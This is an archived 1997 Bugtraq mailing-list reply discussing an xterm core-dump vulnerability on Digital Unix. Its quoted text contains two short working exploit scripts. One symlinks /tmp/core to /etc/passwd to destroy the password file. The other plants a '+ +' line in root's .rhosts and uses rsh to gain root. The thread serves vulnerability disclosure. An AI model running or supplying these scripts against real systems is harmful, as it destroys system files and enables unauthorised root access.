[5607] in bugtraq
Re: Digital Unix Security Problem
daemon@ATHENA.MIT.EDU (Tom Leffingwell)
Fri Nov 14 13:40:40 1997
Date: Thu, 13 Nov 1997 18:22:58 -0500
Reply-To: Tom Leffingwell <tom@SBA.MIAMI.EDU>
From: Tom Leffingwell <tom@SBA.MIAMI.EDU>
X-To: Andrew Brown <codewarrior@daemon.org>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199711131632.LAA02326@untraceable.net>
DU doesn't allow +'s in /.rhosts, at least under C2, and I think so in
general. It doesn't seem to work even if you specify a user, either.
On Thu, 13 Nov 1997, Andrew Brown wrote:
> > Even with a buffer overflow, I've never seen anyone exploit on one
> >DU. If anyone has done so sucessfully, plese email me. Despite that, a
> >person with basic knowledge of unix could easily do something like:
> >
> >#/!bin/csh
> >cd /tmp
> >ln -s /etc/passwd /tmp/core
> >setenv DISPLAY abcdefghi
> >/usr/bin/X11/xterm
> >
> > The contents of /etc/passwd becomes xterm's core, preventing
> >further logins. Obviously you could do things without an immediate impact
> >such as ln -s /vmunix /tmp/core.
>
> or...if the system you're on is actually running r-services, you could do
>
> #!/bin/sh
> DISPLAY="
> + +
> "
> export DISPLAY
> cd /tmp
> ln -s /.rhosts /tmp/core
> /usr/bin/X11/xterm
> rsh localhost
>
> which sets the DISPLAY variable to an "admit all from all" line and
> the core dump will go into root's .rhosts file. then all that remains
> is the rsh localhost and you're all set!
>
> considerably easier than a buffer overflow exploit...
>
> --
> |-----< "CODE WARRIOR" >-----|
> andrew@echonyc.com (TheMan) * "ah! i see you have the internet
> codewarrior@daemon.org that goes *ping*!"
> warfare@graffiti.com * "information is power -- share the wealth."
>
